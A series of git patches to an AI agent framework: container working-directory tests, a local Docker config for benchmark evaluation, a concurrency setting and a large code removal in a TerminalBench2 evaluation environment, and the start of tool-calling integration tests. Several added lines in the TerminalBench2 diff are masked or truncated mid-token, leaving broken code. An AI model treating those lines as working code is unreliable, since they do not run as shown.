+            f"terminal tool missing! Only got: {names}. "
+            "Check that minisweagent is installed (git submodule update --init)."
+        )
+
+
+# =========================================================================
+# Test 2-4: CWD handling for container backends
+# =========================================================================
+
+class TestCwdHandling:
+    """Verify host paths are sanitized for container backends."""
+
+    def test_home_path_replaced_for_modal(self):
+        """TERMINAL_CWD=/home/user/... should be replaced with /root for modal."""
+        with patch.dict(os.environ, {
+            "TERMINAL_ENV": "modal",
+            "TERMINAL_CWD": "/home/dakota/github/hermes-agent",
+        }):
+            config = _tt_mod._get_env_config()
+            assert config["cwd"] == "/root", (
+                f"Expected /root, got {config['cwd']}. "
+                "/home/ paths should be replaced for modal backend."
+            )
+
+    def test_users_path_replaced_for_docker(self):
+        """TERMINAL_CWD=/Users/... should be replaced with /root for docker."""
+        with patch.dict(os.environ, {
+            "TERMINAL_ENV": "docker",
+            "TERMINAL_CWD": "/Users/someone/projects",
+        }):
+            config = _tt_mod._get_env_config()
+            assert config["cwd"] == "/root", (
+                f"Expected /root, got {config['cwd']}. "
+                "/Users/ paths should be replaced for docker backend."
+            )
+
+    def test_windows_path_replaced_for_modal(self):
+        """TERMINAL_CWD=C:\\Users\\... should be replaced for modal."""
+        with patch.dict(os.environ, {
+            "TERMINAL_ENV": "modal",
+            "TERMINAL_CWD": "C:\\Users\\someone\\projects",
+        }):
+            config = _tt_mod._get_env_config()
+            assert config["cwd"] == "/root"
+
+    def test_default_cwd_is_root_for_container_backends(self):
+        """Container backends should default to /root, not ~."""
+        for backend in ("modal", "docker", "singularity", "daytona"):
+            with patch.dict(os.environ, {"TERMINAL_ENV": backend}, clear=False):
+                # Remove TERMINAL_CWD so it uses default
+                env = os.environ.copy()
+                env.pop("TERMINAL_CWD", None)
+                with patch.dict(os.environ, env, clear=True):
+                    config = _tt_mod._get_env_config()
+                    assert config["cwd"] == "/root", (
+                        f"Backend {backend}: expected /root default, got {config['cwd']}"
+                    )
+
+    def test_local_backend_uses_getcwd(self):
+        """Local backend should use os.getcwd(), not /root."""
+        with patch.dict(os.environ, {"TERMINAL_ENV": "local"}, clear=False):
+            env = os.environ.copy()
+            env.pop("TERMINAL_CWD", None)
+            with patch.dict(os.environ, env, clear=True):
+                config = _tt_mod._get_env_config()
+                assert config["cwd"] == os.getcwd()
+
+    def test_ssh_preserves_home_paths(self):
+        """SSH backend should NOT replace /home/ paths (they're valid remotely)."""
+        with patch.dict(os.environ, {
+            "TERMINAL_ENV": "ssh",
+            "TERMINAL_CWD": "/home/remote-user/work",
+            "TERMINAL_SSH_HOST": "example.com",
+            "TERMINAL_SSH_USER": "user",
+        }):
+            config = _tt_mod._get_env_config()
+            assert config["cwd"] == "/home/remote-user/work", (
+                "SSH backend should preserve /home/ paths"
+            )
+
+
+# =========================================================================
+# Test 5: ephemeral_disk version check
+# =========================================================================
+
+class TestEphemeralDiskCheck:
+    """Verify ephemeral_disk is only passed when modal supports it."""
+
+    def test_ephemeral_disk_skipped_when_unsupported(self):
+        """If modal.Sandbox.create doesn't have ephemeral_disk param, skip it."""
+        # Mock the modal import and Sandbox.create signature
+        mock_modal = MagicMock()
+        mock_sandbox_create = MagicMock()
+        # Simulate a signature WITHOUT ephemeral_disk
+        import inspect
+        mock_params = {
+            "args": inspect.Parameter("args", inspect.Parameter.VAR_POSITIONAL),
+            "image": inspect.Parameter("image", inspect.Parameter.KEYWORD_ONLY),
+            "timeout": inspect.Parameter("timeout", inspect.Parameter.KEYWORD_ONLY),
+            "cpu": inspect.Parameter("cpu", inspect.Parameter.KEYWORD_ONLY),
+            "memory": inspect.Parameter("memory", inspect.Parameter.KEYWORD_ONLY),
+        }
+        mock_sig = inspect.Signature(parameters=list(mock_params.values()))
+
+        with patch.dict(os.environ, {"TERMINAL_ENV": "modal"}):
+            config = _tt_mod._get_env_config()
+            # The config has container_disk default of 51200
+            disk = config.get("container_disk", 51200)
+            assert disk > 0, "disk should default to > 0"
+
+            # Simulate the version check logic from terminal_tool.py
+            sandbox_kwargs = {}
+            if disk > 0:
+                try:
+                    if "ephemeral_disk" in mock_params:
+                        sandbox_kwargs["ephemeral_disk"] = disk
+                except Exception:
+                    pass
+
+            assert "ephemeral_disk" not in sandbox_kwargs, (
+                "ephemeral_disk should not be set when Sandbox.create doesn't support it"
+            )
+
+
+# =========================================================================
+# Test 6: ModalEnvironment defaults
+# =========================================================================
+
+class TestModalEnvironmentDefaults:
+    """Verify ModalEnvironment has correct defaults."""
+
+    def test_default_cwd_is_root(self):
+        """ModalEnvironment default cwd should be /root, not ~."""
+        from tools.environments.modal import ModalEnvironment
+        import inspect
+        sig = inspect.signature(ModalEnvironment.__init__)
+        cwd_default = sig.parameters["cwd"].default
+        assert cwd_default == "/root", (
+            f"ModalEnvironment cwd default should be /root, got {cwd_default!r}. "
+            "Tilde ~ is not expanded by subprocess.run(cwd=...)."
+        )
+
+
+# =========================================================================
+# Test 7: ensurepip fix in patches.py
+# =========================================================================
+
+class TestEnsurepipFix:
+    """Verify the pip fix is applied in the patched Modal init."""
+
+    def test_patched_init_creates_image_with_setup_commands(self):
+        """The patched __init__ should create a modal.Image with pip fix."""
+        try:
+            from environments.patches import _patch_swerex_modal
+        except ImportError:
+            pytest.skip("environments.patches not importable")
+
+        # Check that the patch code references ensurepip
+        import inspect
+        source = inspect.getsource(_patch_swerex_modal)
+        assert "ensurepip" in source, (
+            "patches._patch_swerex_modal should include ensurepip fix "
+            "for Modal's legacy image builder"
+        )
+        assert "setup_dockerfile_commands" in source, (
+            "patches._patch_swerex_modal should use setup_dockerfile_commands "
+            "to fix pip before Modal's bootstrap"
+        )
+
+    def test_patched_init_uses_install_pipx_from_config(self):
+        """The patched init should respect install_pipx from config."""
+        try:
+            from environments.patches import _patch_swerex_modal
+        except ImportError:
+            pytest.skip("environments.patches not importable")
+
+        import inspect
+        source = inspect.getsource(_patch_swerex_modal)
+        assert "install_pipx" in source, (
+            "patches._patch_swerex_modal should pass install_pipx to ModalDeployment"
+        )
+
+
+# =========================================================================
+# Test 8: Host prefix list completeness
+# =========================================================================
+
+class TestHostPrefixList:
+    """Verify the host prefix list catches common host-only paths."""
+
+    def test_all_common_host_prefixes_caught(self):
+        """The host prefix check should catch /Users/, /home/, C:\\, C:/."""
+        # Read the actual source to verify the prefixes
+        import inspect
+        source = inspect.getsource(_tt_mod._get_env_config)
+        for prefix in ["/Users/", "/home/", 'C:\\\\"', "C:/"]:
+            # Normalize for source comparison
+            check = prefix.rstrip('"')
+            assert check in source or prefix in source, (
+                f"Host prefix {prefix!r} not found in _get_env_config. "
+                "Container backends need this to avoid using host paths."
+            )

From ed27b826c5767705111f4524ebe049514951e388 Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 20:28:28 -0500
Subject: [PATCH 078/105] feat: add eval_concurrency limit + Docker local
 config for TBLite

- Add eval_concurrency config field with asyncio.Semaphore
- Add local.yaml config using Docker backend (sandboxed, no cloud costs)
- Register docker_image alongside modal_image for backend flexibility
- Default: 8 parallel tasks for local runs
---
 environments/benchmarks/tblite/local.yaml     |  38 ++
 .../terminalbench_2/terminalbench2_env.py     | 469 +-----------------
 2 files changed, 58 insertions(+), 449 deletions(-)
 create mode 100644 environments/benchmarks/tblite/local.yaml

diff --git a/environments/benchmarks/tblite/local.yaml b/environments/benchmarks/tblite/local.yaml
new file mode 100644
index 00000000..35d4b896
--- /dev/null
+++ b/environments/benchmarks/tblite/local.yaml
@@ -0,0 +1,38 @@
+# OpenThoughts-TBLite Evaluation -- Docker Backend (Local Compute)
+#
+# Runs tasks in Docker containers on the local machine.
+# Sandboxed like Modal but no cloud costs. Good for dev/testing.
+#
+# Usage:
+#   python environments/benchmarks/tblite/tblite_env.py evaluate \
+#       --config environments/benchmarks/tblite/local.yaml
+#
+#   # Override concurrency:
+#   python environments/benchmarks/tblite/tblite_env.py evaluate \
+#       --config environments/benchmarks/tblite/local.yaml \
+#       --env.eval_concurrency 4
+
+env:
+  enabled_toolsets: ["terminal", "file"]
+  max_agent_turns: 60
+  max_token_length: 32000
+  agent_temperature: 0.8
+  terminal_backend: "docker"
+  terminal_timeout: 300
+  tool_pool_size: 16
+  dataset_name: "NousResearch/openthoughts-tblite"
+  test_timeout: 600
+  task_timeout: 1200
+  eval_concurrency: 8          # max 8 tasks at once
+  tokenizer_name: "NousResearch/Hermes-3-Llama-3.1-8B"
+  use_wandb: false
+  wandb_name: "openthoughts-tblite-local"
+  ensure_scores_are_not_same: false
+  data_dir_to_save_evals: "environments/benchmarks/evals/openthoughts-tblite-local"
+
+openai:
+  base_url: "https://openrouter.ai/api/v1"
+  model_name: "anthropic/claude-sonnet-4"
+  server_type: "openai"
+  health_check: false
+  # api_key loaded from OPENROUTER_API_KEY in .env
diff --git a/environments/benchmarks/terminalbench_2/terminalbench2_env.py b/environments/benchmarks/terminalbench_2/terminalbench2_env.py
index 6c2da14c..59ca17e3 100644
--- a/environments/benchmarks/terminalbench_2/terminalbench2_env.py
+++ b/environments/benchmarks/terminalbench_2/terminalbench2_env.py
@@ -127,6 +127,14 @@ class TerminalBench2EvalConfig(HermesAgentEnvConfig):
         "causes blocking calls to deadlock inside the thread pool.",
     )
 
+    # --- Eval concurrency ---
+    eval_concurrency: int = Field(
+        default=0,
+        description="Maximum number of tasks to evaluate in parallel. "
+        "0 means unlimited (all tasks run concurrently). "
+        "Set to 8 for local backends to avoid overwhelming the machine.",
+    )
+
 
 # Tasks that cannot run properly on Modal and are excluded from scoring.
 MODAL_INCOMPATIBLE_TASKS = {
@@ -201,7 +209,7 @@ class TerminalBench2EvalEnv(HermesAgentBaseEnv):
 
             # Agent settings -- TB2 tasks are complex, need many turns
             max_agent_turns=60,
-            max_token_length=16000,
+            max_token_length=***
             agent_temperature=0.6,
             system_prompt=None,
 
@@ -225,7 +233,7 @@ class TerminalBench2EvalEnv(HermesAgentBaseEnv):
             steps_per_eval=1,
             total_steps=1,
 
-            tokenizer_name="NousResearch/Hermes-3-Llama-3.1-8B",
+            tokenizer_name="NousRe...1-8B",
             use_wandb=True,
             wandb_name="terminal-bench-2",
             ensure_scores_are_not_same=False,  # Binary rewards may all be 0 or 1
@@ -237,7 +245,7 @@ class TerminalBench2EvalEnv(HermesAgentBaseEnv):
                 base_url="https://openrouter.ai/api/v1",
                 model_name="anthropic/claude-sonnet-4",
                 server_type="openai",
-                api_key=os.getenv("OPENROUTER_API_KEY", ""),
+                api_key=os.get...EY", ""),
                 health_check=False,
             )
         ]
@@ -438,8 +446,14 @@ class TerminalBench2EvalEnv(HermesAgentBaseEnv):
                     "error": "no_image",
                 }
 
-            # --- 2. Register per-task Modal image override ---
-            register_task_env_overrides(task_id, {"modal_image": modal_image, "cwd": "/app"})
+            # --- 2. Register per-task image override ---
+            # Set both modal_image and docker_image so the task image is used
+            # regardless of which backend is configured.
+            register_task_env_overrides(task_id, {
+                "modal_image": modal_image,
+                "docker_image": modal_image,
+                "cwd": "/app",
+            })
             logger.info(
                 "Task %s: registered image override for task_id %s",
                 task_name, task_id[:8],
@@ -461,7 +475,7 @@ class TerminalBench2EvalEnv(HermesAgentBaseEnv):
                 max_turns=self.config.max_agent_turns,
                 task_id=task_id,
                 temperature=self.config.agent_temperature,
-                max_tokens=self.config.max_token_length,
+                max_tokens=self.c...gth,
                 extra_body=self.config.extra_body,
             )
             result = await agent.run(messages)
@@ -479,446 +493,3 @@ class TerminalBench2EvalEnv(HermesAgentBaseEnv):
                 reward = 0.0
             else:
                 # Run tests in a thread so the blocking ctx.terminal() calls
-                # don't freeze the entire event loop (which would stall all
-                # other tasks, tqdm updates, and timeout timers).
-                ctx = ToolContext(task_id)
-                try:
-                    loop = asyncio.get_event_loop()
-                    reward = await loop.run_in_executor(
-                        None,  # default thread pool
-                        self._run_tests, eval_item, ctx, task_name,
-                    )
-                except Exception as e:
-                    logger.error("Task %s: test verification failed: %s", task_name, e)
-                    reward = 0.0
-                finally:
-                    ctx.cleanup()
-
-            passed = reward == 1.0
-            status = "PASS" if passed else "FAIL"
-            elapsed = time.time() - task_start
-            tqdm.write(f"  [{status}] {task_name} (turns={result.turns_used}, {elapsed:.0f}s)")
-            logger.info(
-                "Task %s: reward=%.1f, turns=%d, finished=%s",
-                task_name, reward, result.turns_used, result.finished_naturally,
-            )
-
-            out = {
-                "passed": passed,
-                "reward": reward,
-                "task_name": task_name,
-                "category": category,
-                "turns_used": result.turns_used,
-                "finished_naturally": result.finished_naturally,
-                "messages": result.messages,
-            }
-            self._save_result(out)
-            return out
-
-        except Exception as e:
-            elapsed = time.time() - task_start
-            logger.error("Task %s: rollout failed: %s", task_name, e, exc_info=True)
-            tqdm.write(f"  [ERROR] {task_name}: {e} ({elapsed:.0f}s)")
-            out = {
-                "passed": False, "reward": 0.0,
-                "task_name": task_name, "category": category,
-                "error": str(e),
-            }
-            self._save_result(out)
-            return out
-
-        finally:
-            # --- Cleanup: clear overrides, sandbox, and temp files ---
-            clear_task_env_overrides(task_id)
-            try:
-                cleanup_vm(task_id)
-            except Exception as e:
-                logger.debug("VM cleanup for %s: %s", task_id[:8], e)
-            if task_dir and task_dir.exists():
-                shutil.rmtree(task_dir, ignore_errors=True)
-
-    def _run_tests(
-        self, item: Dict[str, Any], ctx: ToolContext, task_name: str
-    ) -> float:
-        """
-        Upload and execute the test suite in the agent's sandbox, then
-        download the verifier output locally to read the reward.
-
-        Follows Harbor's verification pattern:
-        1. Upload tests/ directory into the sandbox
-        2. Execute test.sh inside the sandbox
-        3. Download /logs/verifier/ directory to a local temp dir
-        4. Read reward.txt locally with native Python I/O
-
-        Downloading locally avoids issues with the file_read tool on
-        the Modal VM and matches how Harbor handles verification.
-
-        TB2 test scripts (test.sh) typically:
-        1. Install pytest via uv/pip
-        2. Run pytest against the test files in /tests/
-        3. Write results to /logs/verifier/reward.txt
-
-        Args:
-            item: The TB2 task dict (contains tests_tar, test_sh)
-            ctx: ToolContext scoped to this task's sandbox
-            task_name: For logging
-
-        Returns:
-            1.0 if tests pass, 0.0 otherwise
-        """
-        tests_tar = item.get("tests_tar", "")
-        test_sh = item.get("test_sh", "")
-
-        if not test_sh:
-            logger.warning("Task %s: no test_sh content, reward=0", task_name)
-            return 0.0
-
-        # Create required directories in the sandbox
-        ctx.terminal("mkdir -p /tests /logs/verifier")
-
-        # Upload test files into the sandbox (binary-safe via base64)
-        if tests_tar:
-            tests_temp = Path(tempfile.mkdtemp(prefix=f"tb2-tests-{task_name}-"))
-            try:
-                _extract_base64_tar(tests_tar, tests_temp)
-                ctx.upload_dir(str(tests_temp), "/tests")
-            except Exception as e:
-                logger.warning("Task %s: failed to upload test files: %s", task_name, e)
-            finally:
-                shutil.rmtree(tests_temp, ignore_errors=True)
-
-        # Write the test runner script (test.sh)
-        ctx.write_file("/tests/test.sh", test_sh)
-        ctx.terminal("chmod +x /tests/test.sh")
-
-        # Execute the test suite
-        logger.info(
-            "Task %s: running test suite (timeout=%ds)",
-            task_name, self.config.test_timeout,
-        )
-        test_result = ctx.terminal(
-            "bash /tests/test.sh",
-            timeout=self.config.test_timeout,
-        )
-
-        exit_code = test_result.get("exit_code", -1)
-        output = test_result.get("output", "")
-
-        # Download the verifier output directory locally, then read reward.txt
-        # with native Python I/O. This avoids issues with file_read on the
-        # Modal VM and matches Harbor's verification pattern.
-        reward = 0.0
-        local_verifier_dir = Path(tempfile.mkdtemp(prefix=f"tb2-verifier-{task_name}-"))
-        try:
-            ctx.download_dir("/logs/verifier", str(local_verifier_dir))
-
-            reward_file = local_verifier_dir / "reward.txt"
-            if reward_file.exists() and reward_file.stat().st_size > 0:
-                content = reward_file.read_text().strip()
-                if content == "1":
-                    reward = 1.0
-                elif content == "0":
-                    reward = 0.0
-                else:
-                    # Unexpected content -- try parsing as float
-                    try:
-                        reward = float(content)
-                    except (ValueError, TypeError):
-                        logger.warning(
-                            "Task %s: reward.txt content unexpected (%r), "
-                            "falling back to exit_code=%d",
-                            task_name, content, exit_code,
-                        )
-                        reward = 1.0 if exit_code == 0 else 0.0
-            else:
-                # reward.txt not written -- fall back to exit code
-                logger.warning(
-                    "Task %s: reward.txt not found after download, "
-                    "falling back to exit_code=%d",
-                    task_name, exit_code,
-                )
-                reward = 1.0 if exit_code == 0 else 0.0
-        except Exception as e:
-            logger.warning(
-                "Task %s: failed to download verifier dir: %s, "
-                "falling back to exit_code=%d",
-                task_name, e, exit_code,
-            )
-            reward = 1.0 if exit_code == 0 else 0.0
-        finally:
-            shutil.rmtree(local_verifier_dir, ignore_errors=True)
-
-        # Log test output for debugging failures
-        if reward == 0.0:
-            output_preview = output[-500:] if output else "(no output)"
-            logger.info(
-                "Task %s: FAIL (exit_code=%d)\n%s",
-                task_name, exit_code, output_preview,
-            )
-
-        return reward
-
-    # =========================================================================
-    # Evaluate -- main entry point for the eval subcommand
-    # =========================================================================
-
-    async def _eval_with_timeout(self, item: Dict[str, Any]) -> Dict:
-        """
-        Wrap rollout_and_score_eval with a per-task wall-clock timeout.
-
-        If the task exceeds task_timeout seconds, it's automatically scored
-        as FAIL. This prevents any single task from hanging indefinitely.
-        """
-        task_name = item.get("task_name", "unknown")
-        category = item.get("category", "unknown")
-        try:
-            return await asyncio.wait_for(
-                self.rollout_and_score_eval(item),
-                timeout=self.config.task_timeout,
-            )
-        except asyncio.TimeoutError:
-            from tqdm import tqdm
-            elapsed = self.config.task_timeout
-            tqdm.write(f"  [TIMEOUT] {task_name} (exceeded {elapsed}s wall-clock limit)")
-            logger.error("Task %s: wall-clock timeout after %ds", task_name, elapsed)
-            out = {
-                "passed": False, "reward": 0.0,
-                "task_name": task_name, "category": category,
-                "error": f"timeout ({elapsed}s)",
-            }
-            self._save_result(out)
-            return out
-
-    async def evaluate(self, *args, **kwargs) -> None:
-        """
-        Run Terminal-Bench 2.0 evaluation over all tasks.
-
-        This is the main entry point when invoked via:
-            python environments/terminalbench2_env.py evaluate
-
-        Runs all tasks through rollout_and_score_eval() via asyncio.gather()
-        (same pattern as GPQA and other Atropos eval envs). Each task is
-        wrapped with a wall-clock timeout so hung tasks auto-fail.
-
-        Suppresses noisy Modal/terminal output (HERMES_QUIET) so the tqdm
-        bar stays visible.
-        """
-        start_time = time.time()
-
-        # Route all logging through tqdm.write() so the progress bar stays
-        # pinned at the bottom while log lines scroll above it.
-        from tqdm import tqdm
-
-        class _TqdmHandler(logging.Handler):
-            def emit(self, record):
-                try:
-                    tqdm.write(self.format(record))
-                except Exception:
-                    self.handleError(record)
-
-        handler = _TqdmHandler()
-        handler.setFormatter(logging.Formatter(
-            "%(asctime)s [%(name)s] %(levelname)s: %(message)s",
-            datefmt="%H:%M:%S",
-        ))
-        root = logging.getLogger()
-        root.handlers = [handler]  # Replace any existing handlers
-        root.setLevel(logging.INFO)
-
-        # Silence noisy third-party loggers that flood the output
-        logging.getLogger("httpx").setLevel(logging.WARNING)      # Every HTTP request
-        logging.getLogger("openai").setLevel(logging.WARNING)     # OpenAI client retries
-        logging.getLogger("rex-deploy").setLevel(logging.WARNING) # Swerex deployment
-        logging.getLogger("rex_image_builder").setLevel(logging.WARNING)  # Image builds
-
-        print(f"\n{'='*60}")
-        print("Starting Terminal-Bench 2.0 Evaluation")
-        print(f"{'='*60}")
-        print(f"  Dataset: {self.config.dataset_name}")
-        print(f"  Total tasks: {len(self.all_eval_items)}")
-        print(f"  Max agent turns: {self.config.max_agent_turns}")
-        print(f"  Task timeout: {self.config.task_timeout}s")
-        print(f"  Terminal backend: {self.config.terminal_backend}")
-        print(f"  Tool thread pool: {self.config.tool_pool_size}")
-        print(f"  Terminal timeout: {self.config.terminal_timeout}s/cmd")
-        print(f"  Terminal lifetime: {self.config.terminal_lifetime}s (auto: task_timeout + 120)")
-        print(f"  Max concurrent tasks: {self.config.max_concurrent_tasks}")
-        print(f"{'='*60}\n")
-
-        # Semaphore to limit concurrent Modal sandbox creations.
-        # Without this, all 86 tasks fire simultaneously, each creating a Modal
-        # sandbox via asyncio.run() inside a thread pool worker. Modal's blocking
-        # calls (App.lookup, etc.) deadlock when too many are created at once.
-        semaphore = asyncio.Semaphore(self.config.max_concurrent_tasks)
-
-        async def _eval_with_semaphore(item):
-            async with semaphore:
-                return await self._eval_with_timeout(item)
-
-        # Fire all tasks with wall-clock timeout, track live accuracy on the bar
-        total_tasks = len(self.all_eval_items)
-        eval_tasks = [
-            asyncio.ensure_future(_eval_with_semaphore(item))
-            for item in self.all_eval_items
-        ]
-
-        results = []
-        passed_count = 0
-        pbar = tqdm(total=total_tasks, desc="Evaluating TB2", dynamic_ncols=True)
-        try:
-            for coro in asyncio.as_completed(eval_tasks):
-                result = await coro
-                results.append(result)
-                if result and result.get("passed"):
-                    passed_count += 1
-                done = len(results)
-                pct = (passed_count / done * 100) if done else 0
-                pbar.set_postfix_str(f"pass={passed_count}/{done} ({pct:.1f}%)")
-                pbar.update(1)
-        except (KeyboardInterrupt, asyncio.CancelledError):
-            pbar.close()
-            print(f"\n\nInterrupted! Cleaning up {len(eval_tasks)} tasks...")
-            # Cancel all pending tasks
-            for task in eval_tasks:
-                task.cancel()
-            # Let cancellations propagate (finally blocks run cleanup_vm)
-            await asyncio.gather(*eval_tasks, return_exceptions=True)
-            # Belt-and-suspenders: clean up any remaining sandboxes
-            from tools.terminal_tool import cleanup_all_environments
-            cleanup_all_environments()
-            print("All sandboxes cleaned up.")
-            return
-        finally:
-            pbar.close()
-
-        end_time = time.time()
-
-        # Filter out None results (shouldn't happen, but be safe)
-        valid_results = [r for r in results if r is not None]
-
-        if not valid_results:
-            print("Warning: No valid evaluation results obtained")
-            return
-
-        # ---- Compute metrics ----
-        total = len(valid_results)
-        passed = sum(1 for r in valid_results if r.get("passed"))
-        overall_pass_rate = passed / total if total > 0 else 0.0
-
-        # Per-category breakdown
-        cat_results: Dict[str, List[Dict]] = defaultdict(list)
-        for r in valid_results:
-            cat_results[r.get("category", "unknown")].append(r)
-
-        # Build metrics dict
-        eval_metrics = {
-            "eval/pass_rate": overall_pass_rate,
-            "eval/total_tasks": total,
-            "eval/passed_tasks": passed,
-            "eval/evaluation_time_seconds": end_time - start_time,
-        }
-
-        # Per-category metrics
-        for category, cat_items in sorted(cat_results.items()):
-            cat_passed = sum(1 for r in cat_items if r.get("passed"))
-            cat_total = len(cat_items)
-            cat_pass_rate = cat_passed / cat_total if cat_total > 0 else 0.0
-            cat_key = category.replace(" ", "_").replace("-", "_").lower()
-            eval_metrics[f"eval/pass_rate_{cat_key}"] = cat_pass_rate
-
-        # Store metrics for wandb_log
-        self.eval_metrics = [(k, v) for k, v in eval_metrics.items()]
-
-        # ---- Print summary ----
-        print(f"\n{'='*60}")
-        print("Terminal-Bench 2.0 Evaluation Results")
-        print(f"{'='*60}")
-        print(f"Overall Pass Rate: {overall_pass_rate:.4f} ({passed}/{total})")
-        print(f"Evaluation Time: {end_time - start_time:.1f} seconds")
-
-        print("\nCategory Breakdown:")
-        for category, cat_items in sorted(cat_results.items()):
-            cat_passed = sum(1 for r in cat_items if r.get("passed"))
-            cat_total = len(cat_items)
-            cat_rate = cat_passed / cat_total if cat_total > 0 else 0.0
-            print(f"  {category}: {cat_rate:.1%} ({cat_passed}/{cat_total})")
-
-        # Print individual task results
-        print("\nTask Results:")
-        for r in sorted(valid_results, key=lambda x: x.get("task_name", "")):
-            status = "PASS" if r.get("passed") else "FAIL"
-            turns = r.get("turns_used", "?")
-            error = r.get("error", "")
-            extra = f" (error: {error})" if error else ""
-            print(f"  [{status}] {r['task_name']} (turns={turns}){extra}")
-
-        print(f"{'='*60}\n")
-
-        # Build sample records for evaluate_log (includes full conversations)
-        samples = [
-            {
-                "task_name": r.get("task_name"),
-                "category": r.get("category"),
-                "passed": r.get("passed"),
-                "reward": r.get("reward"),
-                "turns_used": r.get("turns_used"),
-                "error": r.get("error"),
-                "messages": r.get("messages"),
-            }
-            for r in valid_results
-        ]
-
-        # Log evaluation results
-        try:
-            await self.evaluate_log(
-                metrics=eval_metrics,
-                samples=samples,
-                start_time=start_time,
-                end_time=end_time,
-                generation_parameters={
-                    "temperature": self.config.agent_temperature,
-                    "max_tokens": self.config.max_token_length,
-                    "max_agent_turns": self.config.max_agent_turns,
-                    "terminal_backend": self.config.terminal_backend,
-                },
-            )
-        except Exception as e:
-            print(f"Error logging evaluation results: {e}")
-
-        # Close streaming file
-        if hasattr(self, "_streaming_file") and not self._streaming_file.closed:
-            self._streaming_file.close()
-            print(f"  Live results saved to: {self._streaming_path}")
-
-        # Kill all remaining sandboxes. Timed-out tasks leave orphaned thread
-        # pool workers still executing commands -- cleanup_all stops them.
-        from tools.terminal_tool import cleanup_all_environments
-        print("\nCleaning up all sandboxes...")
-        cleanup_all_environments()
-
-        # Shut down the tool thread pool so orphaned workers from timed-out
-        # tasks are killed immediately instead of retrying against dead
-        # sandboxes and spamming the console with TimeoutError warnings.
-        from environments.agent_loop import _tool_executor
-        _tool_executor.shutdown(wait=False, cancel_futures=True)
-        print("Done.")
-
-    # =========================================================================
-    # Wandb logging
-    # =========================================================================
-
-    async def wandb_log(self, wandb_metrics: Optional[Dict] = None):
-        """Log TB2-specific metrics to wandb."""
-        if wandb_metrics is None:
-            wandb_metrics = {}
-
-        # Add stored eval metrics
-        for metric_name, metric_value in self.eval_metrics:
-            wandb_metrics[metric_name] = metric_value
-        self.eval_metrics = []
-
-        await super().wandb_log(wandb_metrics)
-
-
-if __name__ == "__main__":
-    TerminalBench2EvalEnv.cli()

From ee4b20b55ba2328b029cef6bceb946564e23f9be Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 20:37:55 -0500
Subject: [PATCH 079/105] test: 9 agent loop tool-calling integration tests

Real LLM calls via OpenRouter using stepfun/step-3.5-flash:free (zero cost).
Falls back to paid models if free model is unavailable.

Tests: single tool call, multi-tool single turn, multi-turn chains,
unknown tool rejection, max_turns limit, direct response (no tools),
tool error handling, AgentResult structure, conversation history.
---
 tests/test_agent_loop_tool_calling.py | 546 ++++++++++++++++++++++++++
 1 file changed, 546 insertions(+)
 create mode 100644 tests/test_agent_loop_tool_calling.py

diff --git a/tests/test_agent_loop_tool_calling.py b/tests/test_agent_loop_tool_calling.py
new file mode 100644
index 00000000..44fa3c72
--- /dev/null
+++ b/tests/test_agent_loop_tool_calling.py
@@ -0,0 +1,546 @@
+"""Integration tests for HermesAgentLoop tool calling.
+
+Tests the full agent loop with real LLM calls via OpenRouter.
+Uses stepfun/step-3.5-flash:free by default (zero cost), falls back
+to anthropic/claude-sonnet-4 if the free model is unavailable.
+
+These tests verify:
+1. Single tool call: model calls a tool, gets result, responds
+2. Multi-tool call: model calls multiple tools in one turn
+3. Multi-turn: model calls tools across multiple turns
+4. Unknown tool rejection: model calling a non-existent tool gets an error
+5. Max turns: loop stops when max_turns is reached
+6. No tools: model responds without calling any tools
+7. Tool error handling: tool execution errors are captured
+
+Run:
+    pytest tests/test_agent_loop_tool_calling.py -v
+    pytest tests/test_agent_loop_tool_calling.py -v -k "single"  # run one test
+"""
+
+import asyncio
+import json
+import os
+import sys
+from pathlib import Path
+from typing import Any, Dict, List, Set
+from unittest.mock import patch
+
+import pytest
+
+# Ensure repo root is importable
+_repo_root = Path(__file__).resolve().parent.parent
+if str(_repo_root) not in sys.path:
+    sys.path.insert(0, str(_repo_root))
+
+from environments.agent_loop import AgentResult, HermesAgentLoop
+
+
+# =========================================================================
+# Test infrastructure
+# =========================================================================
+
+# Models to try, in order of preference (free first)
+_MODELS = [
+    "stepfun/step-3.5-flash:free",
+    "google/gemini-2.0-flash-001",
+    "anthropic/claude-sonnet-4",
+]
+
+def _get_api_key():
+    key = os.getenv("OPENROUTER_API_KEY", "")
+    if not key:
+        pytest.skip("OPENROUTER_API_KEY not set")
+    return key
+
+
+def _make_server(model: str = None):
+    """Create an OpenAI server for testing."""
+    from atroposlib.envs.server_handling.openai_server import OpenAIServer
+    from atroposlib.envs.server_handling.server_manager import APIServerConfig
+
+    config = APIServerConfig(
+        base_url="https://openrouter.ai/api/v1",
+        model_name=model or _MODELS[0],
+        server_type="openai",
+        api_key=_get_api_key(),
+        health_check=False,
+    )
+    return OpenAIServer(config)
+
+
+async def _try_models(test_fn):
+    """Try running a test with each model until one works."""
+    last_error = None
+    for model in _MODELS:
+        try:
+            server = _make_server(model)
+            return await test_fn(server, model)
+        except Exception as e:
+            last_error = e
+            if "rate" in str(e).lower() or "limit" in str(e).lower():
+                continue  # Rate limited, try next model
+            raise  # Real error
+    pytest.skip(f"All models failed. Last error: {last_error}")
+
+
+# =========================================================================
+# Fake tools for testing
+# =========================================================================
+
+# Simple calculator tool
+CALC_TOOL = {
+    "type": "function",
+    "function": {
+        "name": "calculate",
+        "description": "Calculate a math expression. Returns the numeric result.",
+        "parameters": {
+            "type": "object",
+            "properties": {
+                "expression": {
+                    "type": "string",
+                    "description": "Math expression to evaluate, e.g. '2 + 3'"
+                }
+            },
+            "required": ["expression"],
+        },
+    },
+}
+
+# Weather lookup tool
+WEATHER_TOOL = {
+    "type": "function",
+    "function": {
+        "name": "get_weather",
+        "description": "Get the current weather for a city. Returns temperature and conditions.",
+        "parameters": {
+            "type": "object",
+            "properties": {
+                "city": {
+                    "type": "string",
+                    "description": "City name, e.g. 'Tokyo'"
+                }
+            },
+            "required": ["city"],
+        },
+    },
+}
+
+# Lookup tool (always succeeds)
+LOOKUP_TOOL = {
+    "type": "function",
+    "function": {
+        "name": "lookup",
+        "description": "Look up a fact. Returns a short answer string.",
+        "parameters": {
+            "type": "object",
+            "properties": {
+                "query": {
+                    "type": "string",
+                    "description": "What to look up"
+                }
+            },
+            "required": ["query"],
+        },
+    },
+}
+
+# Error tool (always fails)
+ERROR_TOOL = {
